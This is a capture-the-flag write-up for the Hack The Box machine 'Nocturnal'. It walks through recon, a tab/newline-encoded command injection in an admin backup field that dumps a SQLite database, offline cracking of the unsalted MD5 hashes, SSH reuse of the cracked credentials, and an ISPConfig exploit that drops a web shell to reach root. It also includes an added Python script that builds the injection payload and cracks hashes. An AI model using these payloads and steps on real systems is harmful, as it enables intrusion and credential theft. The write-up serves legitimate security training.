Nocturnal
About this machine: HTB
Operating system: Linux
Skills used:
PHP
SQLi
Privilege escalation
First reconnaissance with nmap:
nmap -p- --open -sS -T4 -Pn -n 10.10.11.64 -oN First_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 19:29 EDT
Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.01% done; ETC: 19:30 (0:00:15 remaining)
Nmap scan report for 10.10.11.64
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 48.07 seconds
Reconnaissance with default scripts and version detection:
nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.64 -oN SV_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 19:30 EDT
Nmap scan report for 10.10.11.64
Host is up (0.14s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap reports a redirect to http://nocturnal.htb/, so we add the domain to our /etc/hosts to see what is running on port 80:
(screenshot)
We use whatweb to see which technologies the site runs:
whatweb 10.10.11.64
http://nocturnal.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], Title[Welcome to Nocturnal], nginx[1.18.0]
We register an account:
(screenshot)
We enumerate directories with gobuster (directory brute force, not subdomains): /uploads is forbidden and /backups only redirects, so we get nothing useful from this:
gobuster dir -u "http://nocturnal.htb/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://nocturnal.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/uploads  (Status: 403) [Size: 162]
/backups  (Status: 301) [Size: 178] [--> http://nocturnal.htb/backups/]
We try uploading a file while capturing the requests with Burp:
(screenshot)
We brute-force the username parameter to list existing users, and get the following:
(screenshot of the downloads)
After downloading all of their files we find a big clue in Amanda's:
Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.
Yours sincerely, Nocturnal's IT team
So we try logging in to her account with that password:
(screenshot)
Once logged in we find an .odt file and download it:
(screenshot)
We get nothing out of the .odt file, so we go to the administration panel:
(screenshot)
We find several interesting files, but login.php in particular tells us a lot: the user lookup goes through a prepared statement, yet passwords are stored and compared as unsalted MD5 (md5($password) === $result['password']). The admin panel is also where we can reach privileged content using Burp Suite:
The login PHP code:
// Excerpt as captured: the start of this statement and the SQLite3 connection setup above it are cut off.
    prepare("SELECT * FROM users WHERE username = :username");
    $stmt->bindValue(':username', $username, SQLITE3_TEXT);
    $result = $stmt->execute()->fetchArray();
    // Unsalted MD5 of the submitted password compared against the stored digest.
    if ($result && md5($password) === $result['password']) {
        $_SESSION['user_id'] = $result['id'];
        $_SESSION['username'] = $username;
        header('Location: dashboard.php');
        exit();
    } else {
        $error = 'Invalid username or password.';
    }
}
?>
The request through Burp Suite. The password field of the backup function is injected with a shell command: tabs (%09) stand in for spaces, newlines (%0A) separate the injected line from the rest of the command, and sqlite3 is used to dump the database:
POST /admin.php?view=dashboard.php HTTP/1.1
Host: nocturnal.htb
Content-Length: 108
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://nocturnal.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://nocturnal.htb/admin.php?view=dashboard.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=eijjmosqk4m5ggpfg3fa7uosru
Connection: keep-alive

password=%0Abash%09-c%09"sqlite3%09/var/www/nocturnal_database/nocturnal_database.db%09.dump"%0A&backup=
The hashes returned together with the users in the database:
INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb');
INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4');
INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d');
INSERT INTO users VALUES(6,'kavi','f38cde1654b39fea2bd4f72f1ae4cdda');
INSERT INTO users VALUES(7,'e0Al5','101ad4543a96a7fd84908fd0d802e7db');
Now we crack the hashes:
(screenshot)
55c82b1ccd55ab219b3b109b07d5061d  md5  slowmotionapocalypse  (tobias)
f38cde1654b39fea2bd4f72f1ae4cdda  md5  kavi                  (kavi)
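The chain above (tab-encoded command injection through the backup parameter, then cracking the unsalted MD5 digests from the dump) as an added Python example. This is editor-added code, not part of the original writeup or of the box; it sends nothing over the network. The endpoint, field names and database path are taken from the Burp request above, the five dump rows are copied from the output above as sample input, and the wordlist is constructed here for illustration.

```python
import hashlib
import re
from urllib.parse import quote

# Endpoint and database path as seen in the Burp request above; not contacted here.
BACKUP_URL = "http://nocturnal.htb/admin.php?view=dashboard.php"
DB_PATH = "/var/www/nocturnal_database/nocturnal_database.db"

# Sample input: the users rows copied from the sqlite3 .dump shown above.
SAMPLE_DUMP = """\
INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb');
INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4');
INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d');
INSERT INTO users VALUES(6,'kavi','f38cde1654b39fea2bd4f72f1ae4cdda');
INSERT INTO users VALUES(7,'e0Al5','101ad4543a96a7fd84908fd0d802e7db');
"""

# Constructed wordlist for the demo; a real run would feed rockyou or similar.
SAMPLE_WORDLIST = ["password", "nocturnal", "kavi", "slowmotionapocalypse"]

USER_ROW = re.compile(r"INSERT INTO users VALUES\((\d+),'([^']*)','([0-9a-f]{32})'\);")


def build_backup_body(command: str) -> str:
    """Return the x-www-form-urlencoded body that injects `command` via the password field.

    Every space becomes a tab and the command is wrapped in newlines, the same shape
    as the captured payload: the newline makes the shell treat the injected text as
    its own command line, and tabs keep it a single line without using spaces.
    quote() percent-encodes the tabs (%09), newlines (%0A) and double quotes (%22)
    and leaves '/' alone.
    """
    injected = "\n" + command.replace(" ", "\t") + "\n"
    return "password=" + quote(injected) + "&backup="


def dump_command(db_path: str = DB_PATH) -> str:
    """The command the writeup injected: dump the whole SQLite database."""
    return f'bash -c "sqlite3 {db_path} .dump"'


def parse_users_dump(dump: str) -> dict:
    """Map username -> stored MD5 hex digest from the users table of a .dump."""
    return {user: digest for _id, user, digest in USER_ROW.findall(dump)}


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(hashes: dict, wordlist) -> dict:
    """Crack unsalted MD5: hash each candidate once, then look every user up against it.

    Because login.php stores plain md5($password) with no salt, one digest per
    candidate word covers all users at once, and users sharing a password share a hash.
    """
    lookup = {md5_hex(w): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes.items() if h in lookup}


if __name__ == "__main__":
    body = build_backup_body(dump_command())
    print(f"POST {BACKUP_URL}")
    print(f"Content-Length: {len(body)}")
    print(body)
    users = parse_users_dump(SAMPLE_DUMP)
    for user, password in crack_md5(users, SAMPLE_WORDLIST).items():
        print(f"{user}: {password}")
```

The body the builder produces is 108 bytes, which is the Content-Length in the captured request once the double quotes are percent-encoded (Burp displays them decoded in the editor). Replace SAMPLE_WORDLIST with a real wordlist to reproduce the cracking step offline; the tab/newline trick is what to reuse when a target strips or rejects spaces.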
We log in over SSH as tobias and as kavi to try to find something:
ssh tobias@10.10.11.64
password: slowmotionapocalypse
tobias@nocturnal:~$
We're in; now we look for the first flag:
tobias@nocturnal:~$ ls
user.txt
tobias@nocturnal:~$ cat user.txt
565a4b198257c71a6622b0c5ee7a95ba
After an hour looking for a way to escalate privileges, we notice another service listening on port 8080, bound to 127.0.0.1 only (which is why the external scan never showed it):
tobias@nocturnal:~$ netstat -tupln
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
So we open an SSH local port forward to reach it from our own host:
ssh -L 8080:127.0.0.1:8080 tobias@nocturnal.htb
password: slowmotionapocalypse
With the tunnel up, let's see what runs on port 8080:
(screenshot)
It's an ISPConfig instance. We try the same credentials to check for password reuse (admin / slowmotionapocalypse) and we're in:
(screenshot)
We find an exploit for ISPConfig and try it: https://github.com/blindma1den/CVE-2023-46818-Exploit
python3 exploit.py
Usage: python exploit.py
python3 exploit.py http://127.0.0.1:8080 admin slowmotionapocalypse
[+] Logging in as 'admin'
[+] Login successful.
[+] Injecting PHP shell...
[+] Shell dropped at 'sh.php'
[+] Web shell ready. Type commands below. Ctrl+C or 'exit' to quit.
ispconfig-shell#
We're in; now we look for the last flag:
ispconfig-shell# cat /root/root.txt
d03d0a6a332cf31e1bbf26ab4104b05a